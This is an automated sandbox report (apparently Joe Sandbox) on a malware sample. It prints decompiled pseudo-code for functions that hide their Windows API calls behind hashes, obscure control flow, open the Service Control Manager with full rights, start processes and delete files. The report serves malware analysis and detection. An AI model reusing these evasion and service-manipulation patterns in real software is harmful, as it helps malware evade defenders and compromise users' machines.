ReleaseDC.USER32 ref: 0041720A

Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 00426023
Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 0042602D

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
Instruction ID: 659ed99cd56d5ad3ccdcd4dadc3a54c49a5c6667fc5102f6d19300758eb0a966
Opcode Fuzzy Hash: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
Instruction Fuzzy Hash: BBF03030740704AEE230AB629C89B67B7A4EF80755F51442FFA0196290CFB498459FA9

Uniqueness

Uniqueness Score: -1.00%

Function 022330D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E022330D0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t52;
				intOrPtr* _t68;
				void* _t71;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr* _t85;
				intOrPtr* _t90;
				signed int _t95;
				void* _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				void* _t104;

				_t76 =  *((intOrPtr*)(_t103 + 0xc));
				_t52 = 0x22788346;
				_t102 =  *(_t103 + 0x10);
				_t100 =  *(_t103 + 0x14);
				_t95 =  *(_t103 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t104 = _t52 - 0xec2173f;
							if(_t104 <= 0) {
								break;
							}
							if(_t52 == 0x22788346) {
								 *(_t103 + 0x10) = 0x3d53;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
								 *(_t103 + 0x18) = 0xed42;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
								_t52 = 0x27153269;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
								continue;
							} else {
								if(_t52 == 0x27153269) {
									_t85 =  *0x223ddd0;
									if(_t85 == 0) {
										_t85 = E02233E80(_t76, E02233F20(0x7539f5a2), 0xf789cbad, _t102);
										 *0x223ddd0 = _t85;
									}
									_t95 =  *_t85(_t102 + 0x2c);
									_t52 = 0xb58c94f;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t52 != 0x302165a1) {
										goto L20;
									} else {
										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
										continue;
									}
								}
							}
							L30:
						}
						if(_t104 == 0) {
							if(_t76 !=  *(_t103 + 0x10)) {
								goto L29;
							} else {
								_t52 = 0x7338f4f;
								goto L2;
							}
						} else {
							if(_t52 == 0x26fef4f) {
								_t90 =  *0x223e25c;
								if(_t90 == 0) {
									_t90 = E02233E80(_t76, E02233F20(0xbb398380), 0x5b27858b, _t102);
									 *0x223e25c = _t90;
								}
								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
								 *(_t77 + 0x1c) = _t100;
								goto L29;
							} else {
								if(_t52 == 0x7338f4f) {
									_t68 =  *0x223dea8;
									if(_t68 == 0) {
										_t68 = E02233E80(_t76, E02233F20(0xbb398380), 0x97f883e, _t102);
										 *0x223dea8 = _t68;
									}
									_t101 =  *_t68();
									if( *0x223dcec == 0) {
										 *0x223dcec = E02233E80(_t76, E02233F20(0xbb398380), 0xe9233692, _t102);
									}
									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
									_t100 = _t71;
									if(_t100 == 0) {
										L29:
										return 1;
									} else {
										_t52 = 0x26fef4f;
										goto L1;
									}
								} else {
									if(_t52 != 0xb58c94f) {
										goto L20;
									} else {
										_t76 = E02233D10(_t95);
										_t52 = 0x302165a1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L30;
						L20:
					} while (_t52 != 0x2c4ed872);
					return 1;
					goto L30;
				}
			}

0x022330d2
0x022330d6
0x022330dc
0x022330e1
0x022330e6
0x022330ea
0x022330ea
0x022330f0
0x022330f0
0x022330f0
0x022330f0
0x022330f5
0x00000000
0x00000000
0x022331b1
0x02233226
0x0223322e
0x02233233
0x0223323b
0x02233240
0x02233248
0x0223324d
0x02233255
0x0223325a
0x02233262
0x0223326a
0x0223326f
0x0223327c
0x02233280
0x02233285
0x0223328d
0x02233292
0x0223329f
0x022332a3
0x022332a8
0x00000000
0x022331b3
0x022331b8
0x022331ec
0x022331f4
0x0223320c
0x0223320e
0x0223320e
0x0223321a
0x0223321c
0x022330ea
0x022330ea
0x00000000
0x022330ea
0x022331ba
0x022331bf
0x00000000
0x022331c1
0x022331cc
0x00000000
0x022331cc
0x022331bf
0x022331b8
0x00000000
0x022331b1
0x022330fb
0x0223319c
0x00000000
0x022331a2
0x022331a2
0x00000000
0x022331a2
0x02233101
0x02233106
0x022332b5
0x022332bd
0x022332d5
0x022332d7
0x022332d7
0x022332ee
0x022332f0
0x022332f7
0x022332fd
0x02233300
0x00000000
0x0223310c
0x02233111
0x0223312e
0x02233135
0x02233148
0x0223314d
0x0223314d
0x02233154
0x0223315d
0x02233175
0x02233175
0x02233182
0x02233184
0x02233188
0x02233306
0x0223330d
0x0223318e
0x0223318e
0x00000000
0x0223318e
0x02233113
0x02233118
0x00000000
0x0223311e
0x02233125
0x02233127
0x022330ea
0x022330ea
0x00000000
0x022330ea
0x022330ea
0x02233118
0x02233111
0x02233106
0x00000000
0x022331d4
0x022331d4
0x022331e9
0x00000000
0x022331e9

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02233182

Strings

&, xrefs: 0223328D
S=, xrefs: 02233226
B, xrefs: 02233262

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &$B$S=
API String ID: 1279760036-3580750612
Opcode ID: 4b521b2d453ed485b4964c7d019078c9f0a1195a4c8206564795ce192a574a16
Instruction ID: 5fff627adcab5e9511c5d1e4d88bb91a0091beae034f6ef72a7779811a535692
Opcode Fuzzy Hash: 4b521b2d453ed485b4964c7d019078c9f0a1195a4c8206564795ce192a574a16
Instruction Fuzzy Hash: C451C7B1A243029BC719DEA8949852BB7E6FFD4744F104C5EF086CB258DB70DB498BD2

Uniqueness

Uniqueness Score: -1.00%

Function 004080E7, Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004080E7() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x43b634; // 0x1
				_t26 =  *0x43b624; // 0x10
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x43b638; // 0x22905a8
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = RtlAllocateHeap( *0x43b63c, 8, 0x41c4); // executed
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x43b634 =  *0x43b634 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x43b63c, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x60
				_t25 = HeapReAlloc( *0x43b63c, 0,  *0x43b638, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x43b624 =  *0x43b624 + 0x10;
				 *0x43b638 = _t25;
				_t15 =  *0x43b634; // 0x1
				goto L3;
			}

0x004080e7
0x004080ec
0x004080f8
0x0040812a
0x0040812a
0x00408140
0x00408143
0x0040814b
0x0040814e
0x0040817a
0x00000000
0x0040817a
0x0040815d
0x00408165
0x00408168
0x0040817e
0x00408182
0x00408184
0x00408187
0x00408190
0x00000000
0x00408193
0x00408174
0x00000000
0x00408174
0x004080fa
0x0040810f
0x00408117
0x00000000
0x00000000
0x00408119
0x00408120
0x00408125
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 0040810F
RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 00408143
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,004063F8), ref: 0040815D
HeapFree.KERNEL32(00000000,?,?,004063F8), ref: 00408174

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Heap$Alloc$AllocateFreeVirtual
String ID:
API String ID: 1005975451-0
Opcode ID: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
Instruction ID: 7ee1ac0be71f7df2db9aeb831ea59f9b1f4a4243ff11ed4a701e61ad5814e4f6
Opcode Fuzzy Hash: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
Instruction Fuzzy Hash: 4A115870200301AFC7318F18EC46E6A7BB6FB947207505A3DF296DA1B1C770A813CB89

Uniqueness

Uniqueness Score: -1.00%

Function 02234BA0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E02234BA0(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x223e234;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E02233E80(__ebx, E02233F20(0xe66945e6), 0x8d9b356, __ebp);
					 *0x223e234 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x223de64 == 0) {
					 *0x223de64 = E02233E80(_t26, E02233F20(0xbb398380), 0xcbbf9e7f, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x223dc70;
						if(_t15 == 0) {
							_t15 = E02233E80(_t26, E02233F20(0xbb398380), 0x560d239b, _t46);
							 *0x223dc70 = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x223dc70;
						if(_t17 == 0) {
							_t17 = E02233E80(_t26, E02233F20(0xbb398380), 0x560d239b, _t46);
							 *0x223dc70 = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x02234ba0
0x02234ba0
0x02234ba0
0x02234ba9
0x02234bac
0x02234bb0
0x02234bc3
0x02234bc8
0x02234bc8
0x02234bd6
0x02234be0
0x02234bea
0x02234c02
0x02234c02
0x02234c21
0x02234c25
0x02234caa
0x02234c27
0x02234c2d
0x02234c44
0x02234c4b
0x02234c5e
0x02234c63
0x02234c63
0x02234c6c
0x02234c6e
0x02234c75
0x02234c88
0x02234c8d
0x02234c8d
0x02234c96
0x02234ca2
0x02234c2f
0x02234c2f
0x02234c35
0x02234c43
0x02234c43
0x02234c2d

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02234C21

Strings

D, xrefs: 02234BE0
Ei, xrefs: 02234BB2

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: D$Ei
API String ID: 963392458-592548167
Opcode ID: 536524d73150d234903e90576eaa7d9ed7a31ee2524f383329b7311f45224f6f
Instruction ID: db920037a7285f548e874873df86f1e5edc840882bf3a41fddc10e1a7f6bba8a
Opcode Fuzzy Hash: 536524d73150d234903e90576eaa7d9ed7a31ee2524f383329b7311f45224f6f
Instruction Fuzzy Hash: 6821B1B5B203026BE716EBF8AC54B6A37E2AFC0640F404C69F545CB284EFB4D9158BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00426474, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00426474(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed short _t13;
				void* _t16;
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t29;

				_t13 = SetErrorMode(0); // executed
				SetErrorMode(_t13 | 0x00008001); // executed
				_t16 = E00424BFB();
				_t29 = _a4;
				 *((intOrPtr*)(_t16 + 8)) = _t29;
				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
				_t18 =  *((intOrPtr*)(E00424BFB() + 4));
				_t31 = _t18;
				if(_t18 != 0) {
					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
					_t10 =  &_a16; // 0x406468
					 *((intOrPtr*)(_t18 + 0x74)) =  *_t10;
					E004264D7(_t18, _t31);
				}
				if( *((char*)(E00424BFB() + 0x14)) == 0) {
					E00412710();
				}
				_t20 = 1;
				return _t20;
			}

0x0042647d
0x00426484
0x00426486
0x0042648b
0x0042648f
0x00426492
0x0042649a
0x0042649d
0x0042649f
0x004264a5
0x004264a8
0x004264af
0x004264b2
0x004264b6
0x004264bb
0x004264bb
0x004264ca
0x004264cc
0x004264cc
0x004264d3
0x004264d4

APIs

SetErrorMode.KERNELBASE(00000000,00000000,0041845B,00000000,00000000,00000000,00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468), ref: 0042647D
SetErrorMode.KERNELBASE(00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468,00000000), ref: 00426484

Part of subcall function 004264D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508
Part of subcall function 004264D7: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
Part of subcall function 004264D7: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6

Strings

hd@, xrefs: 004264B2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
String ID: hd@
API String ID: 3389432936-3469257913
Opcode ID: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
Instruction ID: 56c02cd2a0ca812c609797d7f3c2b0aa536ab85d6a731917afc158bbbb4402dc
Opcode Fuzzy Hash: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
Instruction Fuzzy Hash: F2F04F71A043205FD714FF25E484B0A7BD4AF44714F06844FF4889B3A2CBB8E841CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 022396B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E022396B0() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* _t44;
				void* _t47;
				void* _t51;
				void* _t62;
				void* _t66;
				void* _t69;
				intOrPtr _t79;
				void* _t90;
				signed int _t103;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;

				_t117 = _v528;
				_t44 = 0x290b7473;
				_t116 = 0;
				_t2 = _t116 + 1; // 0x1
				_t79 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t121 = _t44 - 0x185037e0;
						if(_t121 > 0) {
							break;
						}
						if(_t121 == 0) {
							_v528 = 0x9fb;
							_v528 = _v528 ^ 0xe4a1a680;
							_v528 = _v528 << 0xd;
							_v528 = _v528 + 0xffffacfd;
							_t80 = _v528;
							_t44 = 0xac9ce62;
							_v528 = (_v528 - (0x2f684bdb * _t80 >> 0x20) >> 1) + (0x2f684bdb * _t80 >> 0x20) >> 4;
							_v528 = _v528 << 5;
							_v528 = _v528 ^ 0x3febe949;
							continue;
						} else {
							_t122 = _t44 - 0xac9ce62;
							if(_t122 > 0) {
								__eflags = _t44 - 0x143d843a;
								if(_t44 != 0x143d843a) {
									goto L32;
								} else {
									E02237AB0(_t118);
									_t44 = 0x28458a2;
									continue;
								}
							} else {
								if(_t122 == 0) {
									_t66 =  *0x223ddb8;
									__eflags = _t66;
									if(_t66 == 0) {
										_t66 = E02233E80(_t79, E02233F20(0x667fdee), 0x505cb3fe, _t118);
										 *0x223ddb8 = _t66;
									}
									 *_t66(_t117);
									_t44 = 0x67ba340;
									continue;
								} else {
									if(_t44 == 0x28458a2) {
										_t69 =  *0x223de58;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E02233E80(_t79, E02233F20(0xbb398380), 0xb1aefb5, _t118);
											 *0x223de58 = _t69;
										}
										 *_t69(0,  &_v524, 0x104);
										 *((intOrPtr*)( *0x223e2ec + 0x48)) = E02233D10( &_v536);
										_t44 = 0x311c267c;
										continue;
									} else {
										if(_t44 != 0x67ba340) {
											goto L32;
										} else {
											_t90 =  *0x223df38;
											if(_t90 == 0) {
												_t90 = E02233E80(_t79, E02233F20(0xf9c30097), 0x62c574d8, _t118);
												 *0x223df38 = _t90;
											}
											 *_t90(0, _v528, 0, 0,  *0x223e2ec + 0x5c); // executed
											_t44 = 0x143d843a;
											_t116 =  ==  ? _t79 : _t116;
											continue;
										}
									}
								}
							}
						}
						L38:
					}
					__eflags = _t44 - 0x311c267c;
					if(__eflags > 0) {
						__eflags = _t44 - 0x37104f21;
						if(_t44 != 0x37104f21) {
							goto L32;
						} else {
							__eflags =  *0x223e0f4;
							if( *0x223e0f4 == 0) {
								 *0x223e0f4 = E02233E80(_t79, E02233F20(0x667fdee), 0x7f692adf, _t118);
							}
							_t47 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t117 = _t47;
							__eflags = _t117;
							if(_t117 == 0) {
								_t44 = 0x25965b99;
							} else {
								 *((intOrPtr*)( *0x223e2ec + 0x268)) = _t79;
								_t44 = 0x185037e0;
							}
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 =  *0x223df38;
							__eflags = _t51;
							if(_t51 == 0) {
								_t51 = E02233E80(_t79, E02233F20(0xf9c30097), 0x62c574d8, _t118);
								 *0x223df38 = _t51;
							}
							 *_t51(0, 0x25, 0, 0,  &_v524); // executed
							__eflags =  *0x223e2ec + 0x10;
							E02233070( *0x223e2ec + 0x10);
							goto L37;
						} else {
							__eflags = _t44 - 0x25965b99;
							if(_t44 == 0x25965b99) {
								_v528 = 0x4b7f;
								_v528 = _v528 + 0xffffece0;
								_t103 = (_v528 - (0x3521cfb3 * _v528 >> 0x20) >> 1) + (0x3521cfb3 * _v528 >> 0x20) >> 5;
								_v528 = _t103;
								_v528 = (_t103 << 5) + _v528;
								_v528 = _v528 >> 2;
								_v528 = _v528 ^ 0x000008d8;
								 *((intOrPtr*)( *0x223e2ec + 0x3c)) = 0x2237c60;
								_t44 = 0x67ba340;
								goto L1;
							} else {
								__eflags = _t44 - 0x290b7473;
								if(_t44 != 0x290b7473) {
									goto L32;
								} else {
									_t62 = E022342F0(_t79, 0x480);
									 *0x223e2ec = _t62;
									__eflags = _t62;
									if(_t62 == 0) {
										L37:
										return _t116;
									} else {
										 *((intOrPtr*)(_t62 + 0x38)) = E02237C70;
										_t44 = 0x37104f21;
										goto L1;
									}
								}
							}
						}
					}
					goto L38;
					L32:
					__eflags = _t44 - 0x20400186;
				} while (_t44 != 0x20400186);
				return _t116;
				goto L38;
			}

0x022396b8
0x022396bc
0x022396c2
0x022396c4
0x022396c4
0x022396c7
0x022396d0
0x022396d0
0x022396d0
0x022396d0
0x022396d5
0x00000000
0x00000000
0x022396db
0x022397e7
0x022397f4
0x022397fc
0x02239801
0x02239809
0x0223980f
0x0223981d
0x02239821
0x02239826
0x00000000
0x022396e1
0x022396e1
0x022396e6
0x022397cd
0x022397d2
0x00000000
0x022397d8
0x022397d8
0x022397dd
0x00000000
0x022397dd
0x022396ec
0x022396ec
0x0223979c
0x022397a1
0x022397a3
0x022397b6
0x022397bb
0x022397bb
0x022397c1
0x022397c3
0x00000000
0x022396f2
0x022396f7
0x0223974e
0x02239753
0x02239755
0x02239768
0x0223976d
0x0223976d
0x0223977e
0x0223978f
0x02239792
0x00000000
0x022396f9
0x022396fe
0x00000000
0x02239704
0x02239704
0x0223970c
0x02239724
0x02239726
0x02239726
0x02239740
0x02239744
0x02239749
0x00000000
0x02239749
0x022396fe
0x022396f7
0x022396ec
0x022396e6
0x00000000
0x022396db
0x02239833
0x02239838
0x022398d6
0x022398db
0x00000000
0x022398dd
0x022398e2
0x022398e4
0x022398fc
0x022398fc
0x0223990a
0x0223990c
0x0223990e
0x02239910
0x02239927
0x02239912
0x02239917
0x0223991d
0x0223991d
0x00000000
0x02239910
0x0223983e
0x0223983e
0x02239948
0x0223994d
0x0223994f
0x02239962
0x02239967
0x02239967
0x02239979
0x02239984
0x02239988
0x00000000
0x02239844
0x02239844
0x02239849
0x0223987e
0x0223988b
0x0223989f
0x022398a2
0x022398af
0x022398b3
0x022398b8
0x022398c5
0x022398cc
0x00000000
0x0223984b
0x0223984b
0x02239850
0x00000000
0x02239856
0x0223985b
0x02239860
0x02239865
0x02239867
0x02239990
0x0223999b
0x0223986d
0x0223986d
0x02239874
0x00000000
0x02239874
0x02239867
0x02239850
0x02239849
0x0223983e
0x00000000
0x02239931
0x02239931
0x02239931
0x02239947
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,2564BE4F), ref: 0223990A

Strings

I?, xrefs: 02239826

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: I?
API String ID: 1889721586-46180575
Opcode ID: 2749825edf48c7f3080661e428605f2843cf51b5f08e946edfa35d31db166a29
Instruction ID: 7bce76cf15e94b2db8bc3bd0ca74a9948bd54370196055916d7e0e24bc8ea054
Opcode Fuzzy Hash: 2749825edf48c7f3080661e428605f2843cf51b5f08e946edfa35d31db166a29
Instruction Fuzzy Hash: 2C61E4F1B243015FD729DEE9A48572B33A6AB81714F40881EF556CB388DBB8D844CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022336B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E022336B0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v520;
				intOrPtr* _t3;
				intOrPtr* _t5;
				intOrPtr* _t7;
				int _t10;
				void* _t16;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t41;
				WCHAR* _t42;

				_t41 =  &_v520;
				_t34 = __ecx;
				_t38 = E022334C0(0x223d210);
				_t3 =  *0x223dc60;
				if(_t3 == 0) {
					_t3 = E02233E80(_t16, E02233F20(0xe66945e6), 0xcca28b0d, _t40);
					 *0x223dc60 = _t3;
				}
				 *_t3( &_v520, 0x104, _t38, _t34);
				_t5 =  *0x223dea8;
				_t42 = _t41 + 0x10;
				if(_t5 == 0) {
					_t5 = E02233E80(_t16, E02233F20(0xbb398380), 0x97f883e, _t40);
					 *0x223dea8 = _t5;
				}
				_t35 =  *_t5();
				_t7 =  *0x223e1a0;
				if(_t7 == 0) {
					_t7 = E02233E80(_t16, E02233F20(0xbb398380), 0x26c3f343, _t40);
					 *0x223e1a0 = _t7;
				}
				 *_t7(_t35, 0, _t38);
				if( *0x223df94 == 0) {
					 *0x223df94 = E02233E80(_t16, E02233F20(0xbb398380), 0x86a49eb, _t40);
				}
				_t10 = DeleteFileW(_t42); // executed
				return _t10;
			}

0x022336b0
0x022336b8
0x022336c4
0x022336c6
0x022336cd
0x022336e0
0x022336e5
0x022336e5
0x022336f6
0x022336f8
0x022336fd
0x02233702
0x02233715
0x0223371a
0x0223371a
0x02233721
0x02233723
0x0223372a
0x0223373d
0x02233742
0x02233742
0x0223374b
0x02233756
0x0223376e
0x0223376e
0x02233777
0x0223377f

APIs

DeleteFileW.KERNELBASE ref: 02233777

Strings

Ei, xrefs: 022336CF

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: Ei
API String ID: 4033686569-3988083245
Opcode ID: 1a4eab572f3a903765ff23fe26fc2c1c4aad65efcaaf226eb19d3f89378d6d87
Instruction ID: e363d03a30651d21ca349afa6a17c5988db6a07cb8dc1d62208121304cbc8ded
Opcode Fuzzy Hash: 1a4eab572f3a903765ff23fe26fc2c1c4aad65efcaaf226eb19d3f89378d6d87
